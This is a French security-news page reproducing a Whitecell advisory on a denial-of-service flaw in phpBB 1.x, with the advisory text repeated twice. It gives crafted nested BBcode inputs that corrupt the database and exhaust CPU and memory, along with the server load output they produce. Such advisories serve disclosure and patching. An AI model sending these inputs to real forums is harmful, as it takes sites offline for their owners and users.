Page principale >Hacking / Sécurité
Suite...
Suite...
Suite...
Suite...
Suite...
Vulnérabilité PHPBB dans le process
PHPBB est un forum php open source tres utilisé par les webmasters. Une vulnérabilité permet de détruire la base de donnée PHPBB et de crasher le systeme (DoS)
Vulnérable:
phpBB version 1.4.4
phpBB version 1.4.2
phpBB version 1.4.1
phpBB version 1.4.0
phpBB version 1.2.1
phpBB version 1.2.0
phpBB version 1.0.0
Imunisé:
phpBB version 2.x
Cette vulnérabilité est exploitable via les BBcode.[code][/code],[quote][/quote],[list][/list].
Le fichier en cause est function.php.
En envoyant :
[code] [/code]
Cela va sauvegarder dans la base:
[1code]
[/code1][1code]
[/code1][1code]
[/code1][1code]
[/code1][1code]
[/code1][1code]
[/code1][1code]
[/code1]
De plus, en envoyant:
code]''*800[/code]
Le systeme va alors faire cela:
whitecell$ top PID USER PRI NI SIZE RSS SHARE STAT TIME COMMAND 8643 nobody 13 0 212M 81M 13604 D 8.0 65.7 0:07 httpd
En utilisant une grande partie de la mémoire et du CPU
Apres quelques instants, il affichera:
"Could not enter post text!"
En envoyant des données de 49 Bytes:
code][code][code][/code][/code][/code]
Vous obtiendrez:
PID USER PRI NI SIZE RSS SHARE STAT TIME COMMAND 25741 nobody 14 0 11828 9996 416 R 99.9 7.8 2:38 httpd
Ce qui utilisera 100 % du CPU.
information fournit par :Whitecell Security Systems.
phpBB version 1.4.4
phpBB version 1.4.2
phpBB version 1.4.1
phpBB version 1.4.0
phpBB version 1.2.1
phpBB version 1.2.0
phpBB version 1.0.0
Imunisé:
phpBB version 2.x
Cette vulnérabilité est exploitable via les BBcode.[code][/code],[quote][/quote],[list][/list].
Le fichier en cause est function.php.
En envoyant :
[code] [/code]
Cela va sauvegarder dans la base:
[1code]
[/code1][1code]
[/code1][1code]
[/code1][1code]
[/code1][1code]
[/code1][1code]
[/code1][1code]
[/code1]
De plus, en envoyant:
code]''*800[/code]
Le systeme va alors faire cela:
whitecell$ top PID USER PRI NI SIZE RSS SHARE STAT TIME COMMAND 8643 nobody 13 0 212M 81M 13604 D 8.0 65.7 0:07 httpd
En utilisant une grande partie de la mémoire et du CPU
Apres quelques instants, il affichera:
"Could not enter post text!"
En envoyant des données de 49 Bytes:
code][code][code][/code][/code][/code]
Vous obtiendrez:
PID USER PRI NI SIZE RSS SHARE STAT TIME COMMAND 25741 nobody 14 0 11828 9996 416 R 99.9 7.8 2:38 httpd
Ce qui utilisera 100 % du CPU.
information fournit par :Whitecell Security Systems.
Les + Lus Dans Cette Catégorie
Le Processus d activation de Windows XP mis a nu
Mais quel sont les informations que windows XP envoit à microsoft lors de l'activation du systeme d'exploitation? Quand on connait la politique de la vie privée de redmond, on s'attend au pire....Suite...
Savoir si La RIAA vous en veut
Vous etes un acharné du download sur Kazaa. Votre mule tourne a 110 % et votre disque dur pullule de DivX. Ce que vous ne savez peut etre pas, c'est que vous etes peut etre le prochain sur la liste des poursuites judiciaires de la RIAA.Suite...
le portable Orange SPV vulnerable
Une faille de securité touche le portable Orange SPV ( sound picture video ). Le probleme provient des signatures numériques gerées par un logiciel developpé par ... Microsoft :)Suite...
17 ans et 2000 sites hackes, dont 1 de trop !
DKD, 17 ans et demi, lycéen, a été arrèté chez ses parents à Vélizy-Villacoublay après une enquête de policiers de la criminalité informatique. Après s'etre attaqué au site de la NAVY, c'est le site ..... d'une préfecture qui lui aurait été fatal.Suite...
et de 1 pour office 2003
"Overview of the Office 2003 Critical Update", c'est le nom du premier rejeton d'une grande lignée de bug et patch que s'apprete a connaitre le nouveau Microsoft Office 2003.Suite...
Navigation Rapide
|
Astuces Webmaster Astuces WINDOWS Astuces WINDOWS XP Comment ça marche DVD / Secret Evenements Exploits Hacking / Sécurité | Hardware Jeux Vidéo linux News Script(php,java...) Telephonie/GSM Virus |
